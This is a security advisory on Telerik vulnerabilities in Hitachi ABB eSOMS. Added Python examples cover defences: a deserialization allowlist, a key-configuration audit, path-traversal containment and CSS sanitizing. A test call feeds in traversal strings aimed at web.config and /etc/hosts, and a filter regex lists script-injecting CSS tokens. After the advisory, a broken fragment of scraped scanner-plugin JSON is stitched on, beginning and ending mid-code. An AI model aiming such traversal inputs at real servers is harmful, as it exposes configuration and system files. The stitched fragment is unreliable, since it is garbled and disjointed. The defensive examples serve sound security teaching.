## 1. EXECUTIVE SUMMARY
* **CVSS v3 9.8**
* **ATTENTION:** Exploitable remotely/low skill level to exploit
* **Vendor:** Hitachi ABB Power Grids
* **Equipment:** eSOMS Telerik
* **Vulnerabilities:** Path Traversal, Deserialization of Untrusted Data, Improper Input Validation, Inadequate Encryption Strength, Insufficiently Protected Credentials, Path Traversal
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to upload malicious files to the server, discover sensitive information, or execute arbitrary code.
## 3. TECHNICAL DETAILS
### 3.1 AFFECTED PRODUCTS
Hitachi ABB Power Grids reports the vulnerabilities affect the following eSOMS products:
* eSOMS, all versions prior to 6.3 using a version of Telerik software
### 3.2 VULNERABILITY OVERVIEW
#### 3.2.1 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)
Path traversal in RadChart in Telerik UI for ASP.NET AJAX allows a remote attacker to read and delete an image with extension .BMP, .EXIF, .GIF, .ICON, .JPEG, .PNG, .TIFF, or .WMF on the server through a specially crafted request.
[CVE-2019-19790](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19790>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).
#### 3.2.2 [DESERIALIZATION OF UNTRUSTED DATA CWE-502](<https://cwe.mitre.org/data/definitions/502.html>)
Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known.
[CVE-2019-18935](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).
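The deserialization weakness in 3.2.2 is the kind that an allowlist of concrete types closes: once a type discriminator in client-supplied data can name any class, knowing the encryption key is enough to reach arbitrary constructors. The following is an added example, not code from the advisory, from Hitachi ABB Power Grids, or from Telerik. It is written in Python rather than ASP.NET for illustration, and the type names (`UploadMetadata`, `ChunkInfo`) and the `__type` discriminator are constructed for this example; it shows how a deserializer that instantiates only allowlisted types, with field-level type checks, rejects anything else before any constructor runs.

```python
import json
from dataclasses import dataclass


# Constructed allowlist: the only types this application legitimately expects to receive
# in upload metadata. Hypothetical names, not Telerik's own types.
@dataclass
class UploadMetadata:
    file_name: str
    size: int


@dataclass
class ChunkInfo:
    index: int
    total: int


ALLOWED_TYPES = {"UploadMetadata": UploadMetadata, "ChunkInfo": ChunkInfo}


class DisallowedTypeError(ValueError):
    """Raised when client data names a type that is not on the allowlist."""


def deserialize(payload: str):
    """Parse JSON carrying a '__type' discriminator (constructed convention) and
    instantiate the named type only if it is on ALLOWED_TYPES. The lookup happens
    before any object is built, which is the property an allowlist must guarantee."""
    doc = json.loads(payload)
    if not isinstance(doc, dict) or "__type" not in doc:
        raise DisallowedTypeError("missing type discriminator")
    type_name = doc["__type"]
    cls = ALLOWED_TYPES.get(type_name)
    if cls is None:
        # No reflection-style lookup by name: unknown names are simply rejected.
        raise DisallowedTypeError(f"type {type_name!r} is not on the allowlist")
    fields = {k: v for k, v in doc.items() if k != "__type"}
    expected = cls.__dataclass_fields__
    if set(fields) != set(expected):
        raise DisallowedTypeError("field set does not match the declared type")
    # Field-level type check so a string cannot be smuggled where an int is declared.
    for name, field in expected.items():
        if not isinstance(fields[name], field.type):
            raise DisallowedTypeError(f"field {name!r} has the wrong type")
    return cls(**fields)


def accepts(payload: str) -> bool:
    """True when the payload deserializes to an allowlisted type, False otherwise."""
    try:
        deserialize(payload)
        return True
    except (DisallowedTypeError, ValueError):
        return False
```

The key design point is that the allowlist is consulted by exact name and the constructor is reached only through it; there is no path from client-controlled text to an arbitrary class, whether or not the surrounding transport is encrypted.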
#### 3.2.3 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)
Progress Telerik UI for ASP.NET AJAX before R2 2017 SP2 does not properly restrict user input to RadAsyncUpload, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.
[CVE-2017-11357](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11357>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).
#### 3.2.4 [INADEQUATE ENCRYPTION STRENGTH CWE-326](<https://cwe.mitre.org/data/definitions/326.html>)
Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.
[CVE-2017-11317](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11317>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).
#### 3.2.5 [INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522](<https://cwe.mitre.org/data/definitions/522.html>)
Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise.
[CVE-2017-9248](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9248>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).
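Both 3.2.4 and 3.2.5 come down to key material that is weak, defaulted, or recoverable. A configuration audit that flags those conditions is the check a defender can run before and after applying the vendor update. The following is an added example, not code from the advisory, from Hitachi ABB Power Grids, or from Telerik, and it uses Python rather than ASP.NET for illustration. `Telerik.Web.UI.DialogParametersEncryptionKey` is named in the advisory; the two RadAsyncUpload app settings are the ones named in Telerik's own documentation and are taken from there, not from this page. The 32-character minimum and the two sample `web.config` documents are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Keys the audit expects to be set explicitly in <appSettings>. The first is named in the
# advisory; the other two are the RadAsyncUpload settings from Telerik's documentation.
REQUIRED_APP_KEYS = (
    "Telerik.Web.UI.DialogParametersEncryptionKey",
    "Telerik.AsyncUpload.ConfigurationEncryptionKey",
    "Telerik.Upload.ConfigurationHashKey",
)
MIN_KEY_CHARS = 32                    # constructed threshold, not a vendor requirement
WEAK_DECRYPTION = {"DES", "3DES"}     # <machineKey decryption="..."> values to flag
WEAK_VALIDATION = {"MD5"}             # <machineKey validation="..."> values to flag


def audit_web_config(xml_text: str) -> list:
    """Return a list of findings for an ASP.NET web.config document; empty means clean."""
    findings = []
    root = ET.fromstring(xml_text)
    settings = {a.get("key"): (a.get("value") or "") for a in root.findall("./appSettings/add")}
    for key in REQUIRED_APP_KEYS:
        value = settings.get(key, "").strip()
        if not value:
            findings.append(f"{key}: not set, so the library's built-in default applies")
        elif len(value) < MIN_KEY_CHARS:
            findings.append(f"{key}: shorter than {MIN_KEY_CHARS} characters")
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        if mk.get("decryption", "").upper() in WEAK_DECRYPTION:
            findings.append(f"machineKey: weak decryption algorithm {mk.get('decryption')}")
        if mk.get("validation", "").upper() in WEAK_VALIDATION:
            findings.append(f"machineKey: weak validation algorithm {mk.get('validation')}")
    return findings


# Constructed sample: one short key, one empty key, one missing key, weak machineKey cipher.
WEAK_CONFIG = """<configuration>
  <appSettings>
    <add key="Telerik.Web.UI.DialogParametersEncryptionKey" value="changeme" />
    <add key="Telerik.AsyncUpload.ConfigurationEncryptionKey" value="" />
  </appSettings>
  <system.web>
    <machineKey validationKey="AutoGenerate" decryptionKey="AutoGenerate"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>"""

# Constructed sample with placeholder 48-character keys; in practice generate random values.
_K = "0123456789abcdef0123456789abcdef0123456789abcdef"
HARDENED_CONFIG = f"""<configuration>
  <appSettings>
    <add key="Telerik.Web.UI.DialogParametersEncryptionKey" value="{_K}" />
    <add key="Telerik.AsyncUpload.ConfigurationEncryptionKey" value="{_K}" />
    <add key="Telerik.Upload.ConfigurationHashKey" value="{_K}" />
  </appSettings>
  <system.web>
    <machineKey validationKey="{_K}" decryptionKey="{_K}"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_web_config(cfg) or "no findings")
```

Run it against a copy of the deployed `web.config`; every line it prints is a setting to fix before relying on the encryption the upload handler applies to its metadata.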
#### 3.2.6 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)
Absolute path traversal vulnerability in the RadAsyncUpload control in the RadControls in Telerik UI for ASP.NET AJAX before Q3 2012 SP2 allows remote attackers to write to arbitrary files, and consequently execute arbitrary code, via a full pathname in the UploadID metadata value.
[CVE-2014-2217](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2217>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N>)).
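Sections 3.2.1 and 3.2.6 are the two shapes of the same defect: a client-supplied name reaches the file system either with `..` segments or as an absolute path that replaces the intended base directory when joined. The following is an added example, not code from the advisory, from Hitachi ABB Power Grids, or from Telerik, in Python rather than ASP.NET for illustration. It resolves a client-supplied name under a base directory, checks containment on the canonical path rather than the raw string, and applies the image-extension allowlist the advisory lists for 3.2.1; the base directory used in the usage call and the treatment of backslashes as separators are assumptions of the example.

```python
import os
from pathlib import Path

# Extensions the advisory names for the RadChart image handler (3.2.1), lower-cased.
ALLOWED_IMAGE_EXT = {".bmp", ".exif", ".gif", ".icon", ".jpeg", ".png", ".tiff", ".wmf"}


class UnsafePathError(ValueError):
    """Raised when a client-supplied name would escape the base directory."""


def resolve_within(base_dir: str, client_name: str, allowed_ext=None) -> str:
    """Map client_name onto base_dir and return the resolved path, or raise
    UnsafePathError. Handles both styles from the advisory: relative '../'
    traversal (3.2.1) and an absolute path supplied as the name (3.2.6)."""
    if "\x00" in client_name:
        raise UnsafePathError("NUL byte in file name")
    # An absolute name (or a Windows drive/UNC prefix) would replace base_dir outright
    # when joined, which is the 3.2.6 bug class; reject it before any join happens.
    if os.path.isabs(client_name) or ":" in client_name or client_name.startswith(("\\", "/")):
        raise UnsafePathError("absolute path supplied as file name")
    base = Path(base_dir).resolve()
    # Assumption of this example: backslashes are treated as separators and normalised.
    candidate = (base / client_name.replace("\\", "/")).resolve()
    # Containment is checked on the canonical path, after '..' and symlinks are resolved.
    try:
        candidate.relative_to(base)
    except ValueError:
        raise UnsafePathError("path escapes base directory") from None
    if candidate == base:
        raise UnsafePathError("empty file name")
    if allowed_ext is not None and candidate.suffix.lower() not in allowed_ext:
        raise UnsafePathError(f"extension {candidate.suffix!r} not permitted")
    return str(candidate)


def is_safe_name(base_dir: str, client_name: str, allowed_ext=None) -> bool:
    """Boolean form of resolve_within for logging or tests."""
    try:
        resolve_within(base_dir, client_name, allowed_ext)
        return True
    except UnsafePathError:
        return False


if __name__ == "__main__":
    # Constructed base directory; the path need not exist for the containment check.
    base = "/srv/esoms/images"
    for name in ("2021/chart.png", "../../web.config", "/etc/hosts", "chart.aspx"):
        print(f"{name!r:24} -> {'allowed' if is_safe_name(base, name, ALLOWED_IMAGE_EXT) else 'rejected'}")
```

The check that matters is `candidate.relative_to(base)` on the resolved path; string-prefix tests on the unresolved name are what traversal payloads are built to slip past. The extension allowlist is applied last, so a permitted extension never rescues a path that already failed containment.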
#### 3.2.7 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)
Cross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes.
[CVE-2014-4958](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N>)).
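The vector in 3.2.7 is script execution through CSS expressions carried in `style` attributes of user-submitted HTML. An output-side sanitizer that keeps only an allowlist of CSS properties and drops any declaration containing the dangerous tokens is the standard mitigation for this class. The following is an added example, not code from the advisory, from Hitachi ABB Power Grids, or from Telerik, written in Python for illustration; the property allowlist and the sample fragments are constructed for the example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed allowlist of CSS properties a rich-text field is allowed to carry.
ALLOWED_PROPERTIES = {"color", "background-color", "font-weight", "font-size", "text-align"}

# Tokens that turn a style value into script execution (legacy CSS expressions, bindings)
# or into an attacker-chosen fetch. Backslash escapes and comments are banned because they
# are the usual way to split such tokens past a naive filter.
FORBIDDEN = re.compile(r"expression\s*\(|url\s*\(|javascript:|-moz-binding|@import|\\|/\*",
                       re.IGNORECASE)


def sanitize_style(style: str) -> str:
    """Keep only allowlisted 'property: value' declarations with clean values."""
    kept = []
    for decl in style.split(";"):
        if ":" not in decl:
            continue
        prop, value = decl.split(":", 1)
        prop, value = prop.strip().lower(), value.strip()
        if prop in ALLOWED_PROPERTIES and value and not FORBIDDEN.search(value):
            kept.append(f"{prop}: {value}")
    return "; ".join(kept)


class StyleSanitizer(HTMLParser):
    """Re-emits an HTML fragment with every style attribute passed through sanitize_style."""

    def __init__(self):
        # convert_charrefs=False so entities are re-emitted as written, not decoded into raw markup.
        super().__init__(convert_charrefs=False)
        self.out = []

    def handle_starttag(self, tag, attrs):
        parts = [tag]
        for name, value in attrs:
            value = value or ""
            if name.lower() == "style":
                value = sanitize_style(value)
                if not value:
                    continue  # nothing survived: drop the attribute entirely
            parts.append(f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def sanitize_html(fragment: str) -> str:
    parser = StyleSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample fragment.
    print(sanitize_html('<p style="color:red;background:url(x)">Hi &amp; bye</p>'))
```

This handles only the `style` attribute; in a real editor pipeline it sits inside a full HTML sanitizer that also restricts tags and the other attributes, and it runs on the server at render time rather than trusting client-side cleanup.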
### 3.3 BACKGROUND
* **CRITICAL INFRASTRUCTURE SECTORS:** Energy
* **COUNTRIES/AREAS DEPLOYED:** Worldwide
* **COMPANY HEADQUARTERS LOCATION:** Switzerland
### 3.4 RESEARCHER
Hitachi ABB Power Grids reported these vulnerabilities to CISA.
## 4. MITIGATIONS
Hitachi ABB Power Grids has published an [advisory for eSOMS Telerik](<https://search.abb.com/library/Download.aspx?DocumentID=9AKK107991A8943&LanguageCode=en&DocumentPartId=&Action=Launch>) and advises users to update to eSOMS Version 6.3 as soon as possible.
For additional information and support, contact a product provider or Hitachi ABB Power Grids service organization. For contact information, visit [Hitachi ABB Power Grids contact-centers](<https://www.hitachiabb-powergrids.com/contact-us/>).
Recommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include ensuring applications and servers are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that must be evaluated case by case. Sensitive application servers should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).
Additional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>).
Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.
No known public exploits specifically target these vulnerabilities.
## Contact Information
For any questions related to this report, please contact the CISA at:
Email: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>)
Toll Free: 1-888-282-0870
For industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics
or incident reporting: https://us-cert.cisa.gov/report
'Installed version', 'Fixed version')\n);\n\nif (opt_in)\n report += '\\n\\n' + 'Although the type whitelisting feature of RadAsyncUpload is available for this version,' +\n '\\n' + 'we are not able to determine if this is actually enabled. Following the advisory,' +\n '\\n' + 'you should ensure that this is the case.';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T17:39:57", "description": "The version of Telerik UI for ASP.NET AJAX installed on the remote Windows host is affected by multiple vulnerabilities in Telerik.Web.UI.dll. An unauthenticated, remote attacker can exploit this, via specially crafted data, to execute arbitrary code.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-02T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357"], "modified": "2022-04-22T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2017-11317.NASL", "href": "https://www.tenable.com/plugins/nessus/107096", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107096);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2017-11317\", \"CVE-2017-11357\");\n script_bugtraq_id(103171, 103173);\n script_xref(name:\"IAVA\", value:\"2018-A-0066-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX RadAsyncUpload Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed 
on the remote Windows\nhost is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Telerik UI for ASP.NET AJAX installed on the remote\nWindows host is affected by multiple vulnerabilities in\nTelerik.Web.UI.dll. An unauthenticated, remote attacker can exploit\nthis, via specially crafted data, to execute arbitrary code.\");\n # https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77b0e65f\");\n # https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?49cbdec3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R2 2017 SP2\n(2017.2.711) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11357\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", 
value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\n\nfunction display_dword (dword, nox)\n{\n local_var tmp;\n if (isnull(nox) || (nox == FALSE))\n tmp = \"0x\";\n else\n tmp = \"\";\n return \"\" + tmp + toupper(hexstr(raw_string(\n (dword >>> 24) & 0xFF,\n (dword >>> 16) & 0xFF,\n (dword >>> 8) & 0xFF,\n dword & 0xFF\n )));\n}\n\napp_name = \"Telerik UI for ASP.NET AJAX\";\nhas_a_patch = FALSE;\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\nweb_ui_dll = install['web_ui_dll'];\n\n# 2017.2.711 and later is patched\nif (ver_compare(ver:version, fix:\"2017.2.711.0\", strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2011.1.315 to 2017.2.621 have patches + mitigations available\nif ((ver_compare(ver:version, fix:\"2011.1.315.0\", strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:\"2017.2.621.9999\", strict:FALSE) <= 0))\n\n{\n # check for \"Telerik.Web.UI.Patch\" in the File Description\n\n # Connect to the appropriate share.\n port = kb_smb_transport();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n\n if (!smb_session_init())\n audit(AUDIT_FN_FAIL, \"smb_session_init\");\n\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:web_ui_dll);\n dll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\", 
string:web_ui_dll);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n fh = CreateFile(\n file:dll,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n file_description = NULL;\n if (!isnull(fh))\n {\n ret = GetFileVersionEx(handle:fh);\n if (!isnull(ret)) children = ret['Children'];\n if (!isnull(children))\n {\n varfileinfo = children['VarFileInfo'];\n if (!isnull(varfileinfo))\n {\n translation =\n (get_word (blob:varfileinfo['Translation'], pos:0) << 16) +\n get_word (blob:varfileinfo['Translation'], pos:2);\n translation = tolower(display_dword(dword:translation, nox:TRUE));\n }\n stringfileinfo = children['StringFileInfo'];\n if (!isnull(stringfileinfo) && !isnull(translation))\n {\n data = stringfileinfo[translation];\n if (!isnull(data)) file_description = data['FileDescription'];\n else\n {\n data = stringfileinfo[toupper(translation)];\n if (!isnull(data)) file_description = data['FileDescription'];\n }\n }\n }\n CloseFile(handle:fh);\n }\n NetUseDel();\n\n if (empty_or_null(file_description))\n exit(1, \"Failed to get the file description of \" + web_ui_dll + \".\");\n\n if (file_description == \"Telerik.Web.UI.Patch\")\n has_a_patch = TRUE;\n}\n\nif (has_a_patch)\n{\n # if it has *a* patch, we can't be sure that it is the correct patch\n # and we also can't tell if they have applied the mitigations to go\n # with the patch, so if we're paranoid, we add a note to the report\n # (done below) and if we're not paranoid, we audit out\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n}\n\nport = get_kb_item(\"SMB/transport\");\nif (empty_or_null(port))\n port = 445;\n\nreport = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", \"2017.2.711.0 or vendor supplied patch\"\n ),\n 
ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n);\n\nif (has_a_patch)\n report += '\\n\\n' + \"Although a patch has been applied, we aren't able to determine if this is the\" +\n '\\n' + \"correct patch for these vulnerabilities. As per the vendor advisory, you must\" +\n '\\n' + \"ensure that the patch you applied was downloaded after August 15th, 2017. You\" +\n '\\n' + \"must also ensure the appropriate mitigations (disable file uploads or disable\" +\n '\\n' + \"POST requests) have been applied as per the vendor advisory\";\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-14T16:20:58", "description": "According to its self-reported version number, the version of Telerik UI for ASP.NET AJAX is affected by multiple vulnerabilities in Telerik.Web.UI.dll :\n\n - An insecure direct object reference vulnerability due to user input used directly by RadAsyncUpload without modification or validation. (CVE-2017-11357)\n\n - An unrestricted file upload due to weak encryption used in old versions of Telerik.Web.UI to encrypt data used by RadAsyncUpload. 
(CVE-2017-11317) An unauthenticated, remote attacker can exploit this, via specially crafted data, to execute arbitrary code.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112522", "href": "https://www.tenable.com/plugins/was/112522", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-11T16:40:16", "description": "According to its self-reported version, the instance of Dotnetnuke running on the remote web server is 7.0.x prior to 9.5.0. It is, therefore, affected by a XSS vulnerability.\n\n - For websites with user registration enabled, it is possible for a user to craft a registration that would inject malicious content to their profile that could expose information using an XSS style exploit.\n Mitigating Factors Websites not allowing registration will be unaffected by this issue. Fix(es) for This Issue Users must upgrade DNN Platform to version 9.5.0 or later to be protected from this issue. 
Affected Versions DNN Platform version 7.0.0 through 9.4.4 (2020-04)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-06-03T00:00:00", "type": "nessus", "title": "Dotnetnuke 7.0.x < 9.5.0 XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19790"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*"], "id": "DOTNETNUKE_9_5_0.NASL", "href": "https://www.tenable.com/plugins/nessus/137079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137079);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_name(english:\"Dotnetnuke 7.0.x < 9.5.0 XSS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An ASP.NET application running on the remote web server is affected by a XSS vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its 